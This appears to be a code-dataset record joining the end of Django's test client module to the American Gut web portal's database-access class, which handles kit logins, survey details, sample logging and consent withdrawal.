content_type='application/octet-stream', secure=False,
**extra):
"""Constructs an arbitrary HTTP request."""
parsed = urlparse(force_str(path))
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
'SERVER_PORT': str('443') if secure else str('80'),
'wsgi.url_scheme': str('https') if secure else str('http'),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME)
if cookie:
return engine.SessionStore(cookie.value)
session = engine.SessionStore()
session.save()
self.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
return session
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signal_uid = "template-render-%s" % id(request)
signals.template_rendered.connect(on_template_render, dispatch_uid=signal_uid)
# Capture exceptions created by the handler.
exception_uid = "request-exception-%s" % id(request)
got_request_exception.connect(self.store_exc_info, dispatch_uid=exception_uid)
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
response.json = curry(self._parse_json, response)
# Attach the ResolverMatch instance to the response
response.resolver_match = SimpleLazyObject(lambda: resolve(request['PATH_INFO']))
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid=signal_uid)
got_request_exception.disconnect(dispatch_uid=exception_uid)
def get(self, path, data=None, follow=False, secure=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
follow=False, secure=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data=None, follow=False, secure=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def trace(self, path, data='', follow=False, secure=False, **extra):
"""
Send a TRACE request to the server.
"""
response = super(Client, self).trace(path, data=data, secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect.
"""
from django.contrib.auth import authenticate
user = authenticate(**credentials)
if user:
self._login(user)
return True
else:
return False
def force_login(self, user, backend=None):
self._login(user, backend)
def _login(self, user, backend=None):
from django.contrib.auth import login
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user, backend)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
from django.contrib.auth import get_user, logout
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
if self.session:
request.session = self.session
request.user = get_user(request)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _parse_json(self, response, **extra):
if 'application/json' not in response.get('Content-Type'):
raise ValueError(
'Content-Type header is "{0}", not "application/json"'
.format(response.get('Content-Type'))
)
return json.loads(response.content.decode(), **extra)
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
response_url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((response_url, response.status_code))
url = urlsplit(response_url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
if redirect_chain[-1] in redirect_chain[:-1]:
# Check that we're not redirecting to somewhere we've already
# been to, to prevent loops.
raise RedirectCycleError("Redirect loop detected.", last_response=response)
if len(redirect_chain) > 20:
# Such a lengthy chain likely also means a loop, but one with
# a growing path, changing view, or changing query argument;
# 20 is the value of "network.http.redirection-limit" from Firefox.
raise RedirectCycleError("Too many redirects.", last_response=response)
return response
|
filias/django
|
django/test/client.py
|
Python
|
bsd-3-clause
| 27,179
|
from __future__ import division
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The American Gut Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
"""
Centralized database access for the American Gut web portal
"""
import logging
from uuid import UUID
import psycopg2
import bcrypt
import numpy as np
import pandas as pd
import random
import string
from amgut.lib.data_access.sql_connection import TRN
# character sets for kit id, passwords and verification codes
KIT_ALPHA = "abcdefghjkmnpqrstuvwxyz" # removed i, l and o for clarity
KIT_PASSWD = '1234567890'
KIT_VERCODE = KIT_PASSWD
KIT_PASSWD_NOZEROS = KIT_PASSWD[0:-1]
KIT_VERCODE_NOZEROS = KIT_PASSWD_NOZEROS
class AGDataAccess(object):
"""Data Access implementation for all the American Gut web portal
"""
# arbitrary, unique ID and value
human_sites = ['Stool',
'Mouth',
'Right hand',
'Left hand',
'Forehead',
'Torso',
'Left leg',
'Right leg',
'Nares',
'Hair',
'Tears',
'Nasal mucus',
'Ear wax',
'Vaginal mucus']
animal_sites = ['Stool',
'Mouth',
'Nares',
'Ears',
'Skin',
'Fur']
general_sites = ['Animal Habitat',
'Biofilm',
'Dust',
'Food',
'Fermented Food',
'Indoor Surface',
'Outdoor Surface',
'Plant habitat',
'Soil',
'Sole of shoe',
'Water']
#####################################
# Users
#####################################
def authenticateWebAppUser(self, username, password):
""" Attempts to validate authenticate the supplied username/password
Attempt to authenticate the user against the list of users in
web_app_user table. If successful, a dict with user innformation is
returned. If not, the function returns False.
"""
with TRN:
sql = """SELECT cast(ag_login_id as varchar(100)) as ag_login_id,
email, name, address, city,
state, zip, country,kit_password
FROM ag_login
INNER JOIN ag_kit USING (ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [username])
row = TRN.execute_fetchindex()
if not row:
return False
results = dict(row[0])
password = password.encode('utf-8')
if not bcrypt.checkpw(password, results['kit_password']):
return False
results['ag_login_id'] = str(results['ag_login_id'])
return results
def check_login_exists(self, email):
"""Checks if email for login already exists on system
Parameters
----------
email : str
Email for user to check
Returns
-------
ag_login_id or None
If exists, returns ag_login_id, else returns None
"""
with TRN:
clean_email = email.strip().lower()
sql = "SELECT ag_login_id FROM ag_login WHERE LOWER(email) = %s"
TRN.add(sql, [clean_email])
value = TRN.execute_fetchindex()
if value:
value = value[0][0]
return None if value == [] else value
def addAGLogin(self, email, name, address, city, state, zip_, country):
"""Adds a new login or returns the login_id if email already exists
Parameters
----------
email : str
Email to register for user
name : str
Name to register for user
address : str
Street address to register for user
city : str
City to register for user
state : str
State to register for user
zip_ : str
Postal code to register for user
country : str
Country to register for user
Returns
-------
ag_login_id : str
UUID for new user, or existing user if email already in system
"""
with TRN:
clean_email = email.strip().lower()
ag_login_id = self.check_login_exists(email)
if not ag_login_id:
# create the login
sql = """INSERT INTO ag_login
(email, name, address, city, state, zip, country)
VALUES (%s, %s, %s, %s, %s, %s, %s)
RETURNING ag_login_id"""
TRN.add(sql, [clean_email, name, address, city, state, zip_,
country])
ag_login_id = TRN.execute_fetchlast()
return ag_login_id
def getAGBarcodeDetails(self, barcode):
"""Returns information about the barcode from both AG and standard info
Parameters
----------
barcode : str
Barcode to get information for
Returns
-------
dict
All barcode info, keyed to column name
Raises
------
ValueError
Barcode not found in AG information tables
"""
sql = """SELECT email,
cast(ag_kit_barcode_id as varchar(100)),
cast(ag_kit_id as varchar(100)),
barcode,
site_sampled,
environment_sampled,
sample_date,
sample_time,
participant_name,
notes,
refunded,
withdrawn,
moldy,
other,
other_text,
date_of_last_email,
overloaded,
name,
status
FROM ag.ag_kit_barcodes
LEFT JOIN barcodes.barcode USING (barcode)
LEFT JOIN ag.ag_kit USING (ag_kit_id)
LEFT JOIN ag.ag_login_surveys USING (ag_login_id)
LEFT JOIN ag.ag_login USING (ag_login_id)
WHERE barcode = %s"""
with TRN:
TRN.add(sql, [barcode])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Barcode does not exist in AG: %s' % barcode)
return dict(row[0])
def getAGSurveyDetails(self, survey_id, language):
"""Returns survey information of a specific survey_id and language
Parameters
----------
survey_id : str
the id of the survey group
language : str
the language the survey is intended for
Returns
-------
DataFrame
pandas DataFrame of sorted survey details
Raises
------
ValueError
survey_id not found in database
ValueError
language not found in database
"""
if survey_id not in self.getKnownSurveyIds():
raise ValueError('Invalid survey_id')
if language not in self.getKnownLanguages():
raise ValueError('Invalid language')
sql = """SELECT survey_question_id,
survey_group,
%s,
question_shortname,
response,
ag.survey_question_response.display_index
AS response_index
FROM ag.survey_question
LEFT JOIN ag.survey_question_response
USING (survey_question_id)
LEFT JOIN ag.group_questions USING (survey_question_id)
LEFT JOIN ag.surveys USING (survey_group)
WHERE survey_id = %s""" % (language, survey_id)
with TRN:
TRN.add(sql)
survey_details = TRN.execute_fetchindex()
df = pd.DataFrame([dict(r) for r in survey_details],
columns=['survey_question_id',
'survey_group',
language,
'question_shortname',
'response',
'response_index'])
# sorts so that questions emmulate survey order
df = df.sort_values(by=['survey_group',
'survey_question_id',
'response_index']).drop(columns='survey_group')
# converts response_index from float to int
df['response_index'] = df['response_index'].apply(
lambda x: None if np.isnan(x) else int(x), convert_dtype=False)
return df
def getKnownSurveyIds(self):
"""Returns all known survey IDs of each survey type
Returns
-------
list of ints
List of survey_ids in ascending order
Raises
------
ValueError
Survey IDs were not able to be found
"""
sql = """SELECT survey_id FROM ag.surveys"""
with TRN:
TRN.add(sql)
survey_ids = TRN.execute_fetchindex()
if not survey_ids:
raise ValueError('Survey IDs were not able to be found')
# survey_ids must be converted from list of DictRow to a set
survey_ids = [x[0] for x in survey_ids]
unique_survey_ids = set([])
for i in survey_ids:
unique_survey_ids.add(i)
return unique_survey_ids
def getKnownLanguages(self):
"""Returns all known language locales
Returns
-------
list of strings
List of language locales used for surveys
Raises
------
ValueError
Languages were not able to be found
"""
sql = """SELECT column_name FROM information_schema.columns
WHERE table_name = 'survey_response'"""
with TRN:
TRN.add(sql)
languages = TRN.execute_fetchindex()
if not languages:
raise ValueError('Languages were not able to be found')
languages = [x[0] for x in languages]
languages_set = set([])
for i in languages:
languages_set.add(i)
return languages_set
def getAGKitDetails(self, supplied_kit_id):
sql = """SELECT cast(ag_kit_id as varchar(100)),
supplied_kit_id, kit_password, swabs_per_kit, kit_verified,
kit_verification_code, verification_email_sent
FROM ag_kit
WHERE supplied_kit_id = %s"""
with TRN:
TRN.add(sql, [supplied_kit_id])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Supplied kit id does not exist in AG: %s' %
supplied_kit_id)
return dict(row[0])
def registerHandoutKit(self, ag_login_id, supplied_kit_id):
"""Registeres a handout kit to a user
Parameters
----------
ag_login_id : str
UUID4 formatted string of login ID to associate with kit
supplied_kit_id : str
kit ID for the handout kit
Returns
-------
bool
True: success
False: insert failed due to IntegrityError
Raises
------
ValueError
Non-UUID4 value sent as ag_login_id
"""
with TRN:
# make sure properly formatted UUID passed in
UUID(ag_login_id, version=4)
printresults = self.checkPrintResults(supplied_kit_id)
# make sure login_id and skid exists
sql = """SELECT EXISTS(SELECT *
FROM ag.ag_login
WHERE ag_login_id = %s)"""
TRN.add(sql, [ag_login_id])
exists = TRN.execute_fetchlast()
if not exists:
return False
sql = """SELECT EXISTS(SELECT *
FROM ag.ag_handout_kits
WHERE kit_id = %s)"""
TRN.add(sql, [supplied_kit_id])
if not TRN.execute_fetchlast():
return False
sql = """
DO $do$
DECLARE
k_id uuid;
bc varchar;
BEGIN
INSERT INTO ag_kit
(ag_login_id, supplied_kit_id, kit_password, swabs_per_kit,
kit_verification_code, print_results)
SELECT '{0}', kit_id, password, swabs_per_kit,
verification_code, '{1}'
FROM ag_handout_kits WHERE kit_id = %s LIMIT 1
RETURNING ag_kit_id INTO k_id;
FOR bc IN
SELECT barcode
FROM ag_handout_barcodes
WHERE kit_id = %s
LOOP
INSERT INTO ag_kit_barcodes
(ag_kit_id, barcode, sample_barcode_file)
VALUES (k_id, bc, bc || '.jpg');
END LOOP;
DELETE FROM ag_handout_barcodes WHERE kit_id = %s;
DELETE FROM ag_handout_kits WHERE kit_id = %s;
END $do$;
""".format(ag_login_id, printresults)
TRN.add(sql, [supplied_kit_id] * 4)
try:
TRN.execute()
except psycopg2.IntegrityError:
logging.exception('Error on skid %s:' % ag_login_id)
return False
return True
def get_all_handout_kits(self):
with TRN:
sql = 'SELECT kit_id FROM ag.ag_handout_kits'
TRN.add(sql)
return TRN.execute_fetchflatten()
def deleteAGParticipantSurvey(self, ag_login_id, participant_name):
# Remove user from new schema
with TRN:
sql = """SELECT survey_id, participant_email
FROM ag_login_surveys
JOIN ag_consent USING (ag_login_id, participant_name)
WHERE ag_login_id = %s AND participant_name = %s"""
TRN.add(sql, (ag_login_id, participant_name))
# collect all survey_ids and participant_names, since at least the
# former might be more than one.
survey_ids = set()
participant_emails = set()
for hit in TRN.execute_fetchindex():
survey_ids.add(hit[0])
participant_emails.add(hit[1])
sql = """SELECT barcode
FROM ag.source_barcodes_surveys
WHERE survey_id IN %s"""
TRN.add(sql, [tuple(survey_ids)])
barcodes = [x[0] for x in TRN.execute_fetchindex()]
sql = "DELETE FROM survey_answers WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
sql = "DELETE FROM survey_answers_other WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
# Reset survey attached to barcode(s)
for info in self.getParticipantSamples(ag_login_id,
participant_name):
self.deleteSample(info['barcode'], ag_login_id)
# Delete last due to foreign keys
sql = """DELETE FROM ag.source_barcodes_surveys
WHERE survey_id IN %s"""
TRN.add(sql, [tuple(survey_ids)])
if len(barcodes) != 0:
# only delete barcode information, if this is the
# last survey for the given source, i.e. ag_login_id,
# participant_name combination
if len(survey_ids) == 1:
sql = """DELETE FROM ag.ag_kit_barcodes
WHERE barcode IN %s"""
TRN.add(sql, [tuple(barcodes)])
sql = "DELETE FROM ag_login_surveys WHERE survey_id IN %s"
TRN.add(sql, [tuple(survey_ids)])
sql = """DELETE FROM ag_consent
WHERE ag_login_id = %s AND participant_name = %s"""
TRN.add(sql, [ag_login_id, participant_name])
# checks if user has previously been
# removed and is has still revoked consent
sql = """SELECT ag_login_id FROM ag.consent_revoked"""
TRN.add(sql)
revoked = {result[0] for result in TRN.execute_fetchindex()}
# only inserts to ag.consent_revoked if not already there
if ag_login_id not in revoked:
sql = """INSERT INTO ag.consent_revoked
(ag_login_id, participant_name, participant_email)
VALUES (%s, %s, %s)"""
sql_args = [[ag_login_id, participant_name, pemail]
for pemail in participant_emails]
TRN.add(sql, sql_args, many=True)
TRN.execute()
def get_withdrawn(self):
"""Gets the list of withdrawn participants and information
Returns
-------
list of tuple of strings
List of withdrawn participants, in the form
(ag_login_id, participant_name, participant_email, date_revoked)
"""
with TRN:
sql = "SELECT * FROM consent_revoked"
TRN.add(sql)
return TRN.execute_fetchindex()
def getConsent(self, survey_id):
with TRN:
TRN.add("""SELECT agc.participant_name,
agc.participant_email,
agc.parent_1_name,
agc.parent_2_name,
agc.is_juvenile,
agc.deceased_parent,
agc.ag_login_id,
agc.date_signed,
agc.assent_obtainer,
agc.age_range,
agl.survey_id
FROM ag_consent agc
JOIN ag_login_surveys agl
USING (ag_login_id, participant_name)
WHERE agl.survey_id = %s""", [survey_id])
result = TRN.execute_fetchindex()
if not result:
raise ValueError("Survey ID does not exist in DB: %s" %
survey_id)
return dict(result[0])
def logParticipantSample(self, ag_login_id, barcode, sample_site,
environment_sampled, sample_date, sample_time,
participant_name, notes):
with TRN:
if sample_site is not None:
# Get non timepoint specific survey IDs.
# As of this comment, a non timepoint specific survey is
# implicit, and currently limited to vioscreen FFQs
# We do not want to associate timepoint specific surveys
# with the wrong barcode
sql = """SELECT survey_id, vioscreen_status
FROM ag_login_surveys
WHERE ag_login_id = %s
AND participant_name = %s"""
TRN.add(sql, (ag_login_id, participant_name))
results = TRN.execute_fetchindex()
survey_ids = [x[0] for x in results]
statuses = [x[1] for x in results]
# if we have more than 1 ID, filter out those associated to
# vioscreen
if len(survey_ids) > 1:
keep = []
for sid, vs in zip(survey_ids, statuses):
if vs is None:
keep.append(sid)
survey_ids = keep
# if we only have a single survey ID then advance regardless
# of vioscreen status
if len(survey_ids) == 1:
pass
if len(survey_ids) == 0:
# if we don't have a definite non-vioscreen survey ID
# which can arise on legacy accounts, then we'll create a
# new ID without a vioscreen_status entry. Note that
# the associate_barcode_to_survey_id call is necessary to
# add the survey ID into ag_login_surveys and it also takes
# care of the survey_id <-> barcode association
new_survey_id = self.get_new_survey_id()
self.associate_barcode_to_survey_id(ag_login_id,
participant_name,
barcode, new_survey_id)
else:
# otherwise, it is an environmental sample
survey_ids = []
# Add barcode info
sql = """UPDATE ag_kit_barcodes
SET site_sampled = %s, environment_sampled = %s,
sample_date = %s, sample_time = %s,
notes = %s
WHERE barcode = %s"""
TRN.add(sql, [sample_site, environment_sampled, sample_date,
sample_time, notes,
barcode])
if len(survey_ids) > 0:
sql = """INSERT INTO ag.source_barcodes_surveys (survey_id,
barcode)
VALUES (%s, %s)"""
for survey_id in survey_ids:
TRN.add(sql, [survey_id, barcode])
def deleteSample(self, barcode, ag_login_id):
""" Removes by either releasing barcode back for relogging or withdraw
Parameters
----------
barcode : str
Barcode to delete
ag_login_id : UUID4
Login ID for the barcode
Notes
-----
Strictly speaking the ag_login_id isn't needed but it makes it really
hard to hack the function when you would need to know someone else's
login id (a GUID) to delete something maliciously.
If the barcode has never been scanned, assume a mis-log and wipe it so
barcode can be logged again. If barcode has been scanned, that means we
have recieved it and must withdraw it to delete it from the system.
"""
with TRN:
# Figure out if we've received the barcode or not
sql = "SELECT scan_date FROM barcode WHERE barcode = %s"
TRN.add(sql, [barcode])
received = TRN.execute_fetchlast()
if not received:
# Not recieved, so we release the barcode back to be relogged
set_text = """site_sampled = NULL,
sample_time = NULL, sample_date = NULL,
environment_sampled = NULL, notes = NULL"""
sql = "UPDATE barcode SET status = NULL WHERE barcode = %s"
TRN.add(sql, [barcode])
else:
# barcode already recieved, so we withdraw the barcode
set_text = "withdrawn = 'Y'"
sql = """UPDATE ag_kit_barcodes
SET {}
WHERE barcode IN (
SELECT akb.barcode
FROM ag_kit_barcodes akb
INNER JOIN ag_kit ak USING (ag_kit_id)
WHERE ak.ag_login_id = %s
AND akb.barcode = %s)""".format(set_text)
TRN.add(sql, [ag_login_id, barcode])
sql = """DELETE FROM ag.source_barcodes_surveys
WHERE barcode = %s"""
TRN.add(sql, [barcode])
def getHumanParticipants(self, ag_login_id):
# get people from new survey setup
sql = """SELECT DISTINCT participant_name from ag.ag_login_surveys
LEFT JOIN ag.survey_answers USING (survey_id)
JOIN ag.group_questions gq USING (survey_question_id)
JOIN ag.surveys ags USING (survey_group)
WHERE ag_login_id = %s AND ags.survey_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id, 1])
return TRN.execute_fetchflatten()
def associate_barcode_to_survey_id(self, ag_login_id, participant_name,
barcode, survey_id):
"""Associate a barcode to a survey ID
Parameters
----------
ag_login_id : str
A valid AG login ID
participant_name : str
The name of a participant associated with the login
barcode : str
A valid barcode associated with the login
survey_id : str
A valid survey ID
"""
with TRN:
# test first if the barcode is already associated to a participant
sql = """SELECT ag_login_id, participant_name, barcode
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING(survey_id)
WHERE ag_login_id=%s
AND participant_name=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, participant_name, barcode])
results = TRN.execute_fetchflatten()
if len(results) == 0:
# this implies the barcode was unassigned, and this is a new
# assignment.
# Let's verify the barcode is associated to the kit and login
sql = """SELECT 1
FROM ag.ag_login
JOIN ag.ag_kit USING (ag_login_id)
JOIN ag.ag_kit_barcodes USING (ag_kit_id)
WHERE ag_login_id=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, barcode])
results = TRN.execute_fetchflatten()
if len(results) == 0:
# the barcode is not part of a kit with the login ID
raise ValueError("Unexpected barcode / kit relationship")
# the barcode should also not already be linked to a
# participant within the kit
sql = """SELECT 1
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING(survey_id)
WHERE ag_login_id=%s
AND barcode=%s"""
TRN.add(sql, [ag_login_id, barcode])
results = TRN.execute_fetchflatten()
if len(results) > 0:
# the barcode is already assigned to someone on the kit
raise ValueError("Barcode already assigned")
sql = """INSERT INTO ag_login_surveys
(ag_login_id, survey_id, participant_name)
VALUES (%s, %s, %s)"""
TRN.add(sql, [ag_login_id, survey_id, participant_name])
sql = """INSERT INTO ag.source_barcodes_surveys
(survey_id, barcode)
VALUES (%s, %s)"""
TRN.add(sql, [survey_id, barcode])
def updateVioscreenStatus(self, survey_id, status):
with TRN:
sql = """UPDATE ag_login_surveys
SET vioscreen_status = %s
WHERE survey_id = %s"""
TRN.add(sql, (status, survey_id))
def get_vioscreen_status(self, survey_id):
"""Retrieves the vioscreen status for a survey_id
Parameters
----------
survey_id : str
The survey to get status for
Returns
-------
int
Vioscreen status
Raises
------
ValueError
survey_id passed is not in the database
"""
with TRN:
sql = """SELECT vioscreen_status
FROM ag.ag_login_surveys
WHERE survey_id = %s"""
TRN.add(sql, [survey_id])
status = TRN.execute_fetchindex()
if not status:
raise ValueError("Survey ID %s not in database" % survey_id)
return status[0][0]
def getAnimalParticipants(self, ag_login_id):
sql = """SELECT DISTINCT participant_name from ag.ag_login_surveys
JOIN ag.survey_answers USING (survey_id)
JOIN ag.group_questions gq USING (survey_question_id)
JOIN ag.surveys ags USING (survey_group)
WHERE ag_login_id = %s AND ags.survey_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id, 2])
return TRN.execute_fetchflatten()
def getParticipantSamples(self, ag_login_id, participant_name):
sql = """SELECT DISTINCT
ag_kit_barcodes.barcode,
ag_kit_barcodes.site_sampled,
ag_kit_barcodes.sample_date,
ag_kit_barcodes.sample_time,
ag_kit_barcodes.notes,
barcodes.barcode.status
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING (survey_id)
JOIN ag.ag_kit_barcodes USING (barcode)
JOIN barcodes.barcode USING (barcode)
WHERE ag_login_id = %s
AND participant_name = %s
AND (site_sampled IS NOT NULL
AND site_sampled::text <> '')"""
with TRN:
TRN.add(sql, [ag_login_id, participant_name])
rows = TRN.execute_fetchindex()
return [dict(row) for row in rows]
def getEnvironmentalSamples(self, ag_login_id):
sql = """SELECT barcode, site_sampled, sample_date, sample_time,
notes, status
FROM ag_kit_barcodes
INNER JOIN barcode USING (barcode)
INNER JOIN ag_kit USING(ag_kit_id)
WHERE (environment_sampled IS NOT NULL AND
environment_sampled::text <> '')
AND ag_login_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id])
rows = TRN.execute_fetchindex()
return [dict(row) for row in rows]
def getAvailableBarcodes(self, ag_login_id):
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
WHERE coalesce(sample_date::text, '') = ''
AND kit_verified = 'y' AND ag_login_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id])
return TRN.execute_fetchflatten()
def verifyKit(self, supplied_kit_id):
"""Set the KIT_VERIFIED for the supplied_kit_id to 'y'"""
sql = """UPDATE AG_KIT
SET kit_verified='y'
WHERE supplied_kit_id=%s"""
with TRN:
TRN.add(sql, [supplied_kit_id])
def _get_unverified_kits(self):
"""Gets list of unverified kit IDs, Helper function for tests"""
sql = """SELECT supplied_kit_id
FROM AG_KIT
WHERE NOT kit_verified = 'y'"""
with TRN:
TRN.add(sql)
return TRN.execute_fetchflatten()
def getMapMarkers(self):
with TRN:
sql = """SELECT country, count(country)::integer
FROM ag.ag_login GROUP BY country"""
TRN.add(sql)
return dict(TRN.execute_fetchindex())
def handoutCheck(self, username, password):
with TRN:
password = password.encode('utf-8')
sql = "SELECT password FROM ag.ag_handout_kits WHERE kit_id = %s"
TRN.add(sql, [username])
to_check = TRN.execute_fetchindex()
if not to_check:
return False
else:
return bcrypt.checkpw(password, to_check[0][0])
def check_access(self, supplied_kit_id, barcode):
"""Check if the user has access to the barcode
Parameters
----------
supplied_kit_id : str
The user's supplied kit ID
barcode : str
The barcode to check access for
Returns
-------
boolean
True if the user can access the barcode, False otherwise
"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
sql = """SELECT EXISTS (
SELECT barcode
FROM ag.ag_kit
JOIN ag.ag_kit_barcodes USING (ag_kit_id)
WHERE ag_login_id = %s AND barcode = %s)"""
TRN.add(sql, [ag_login_id, barcode])
return TRN.execute_fetchlast()
def getAGKitIDsByEmail(self, email):
"""Returns a list of kitids based on email
email is email address of login
returns a list of kit_id's associated with the email or an empty list
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag_kit
INNER JOIN ag_login USING (ag_login_id)
WHERE email = %s"""
TRN.add(sql, [email.lower()])
return TRN.execute_fetchflatten()
def ag_set_pass_change_code(self, email, kitid, pass_code):
"""updates ag_kit table with the supplied pass_code
email is email address of participant
kitid is supplied_kit_id in the ag_kit table
pass_code is the password change verfication value
"""
sql = """UPDATE ag_kit
SET pass_reset_code = %s,
pass_reset_time = clock_timestamp() + interval '2' hour
WHERE supplied_kit_id = %s AND ag_login_id in
(SELECT ag_login_id FROM ag_login WHERE email = %s)"""
with TRN:
TRN.add(sql, [pass_code, kitid, email])
def ag_update_kit_password(self, kit_id, password):
"""updates ag_kit table with password
kit_id is supplied_kit_id in the ag_kit table
password is the new password
"""
with TRN:
password = password.encode('utf-8')
password = bcrypt.hashpw(password, bcrypt.gensalt())
sql = """UPDATE AG_KIT
SET kit_password = %s, pass_reset_code = NULL
WHERE supplied_kit_id = %s"""
TRN.add(sql, [password, kit_id])
def ag_verify_kit_password_change_code(self, email, kitid, passcode):
"""returns true if it still in the password change window
email is the email address of the participant
kitid is the supplied_kit_id in the ag_kit table
passcode is the password change verification value
"""
sql = """SELECT EXISTS(SELECT pass_reset_time
FROM ag.ag_kit
INNER JOIN ag.ag_login USING (ag_login_id)
WHERE pass_reset_code = %s and email = %s
AND supplied_kit_id = %s
AND NOW() < pass_reset_time)"""
with TRN:
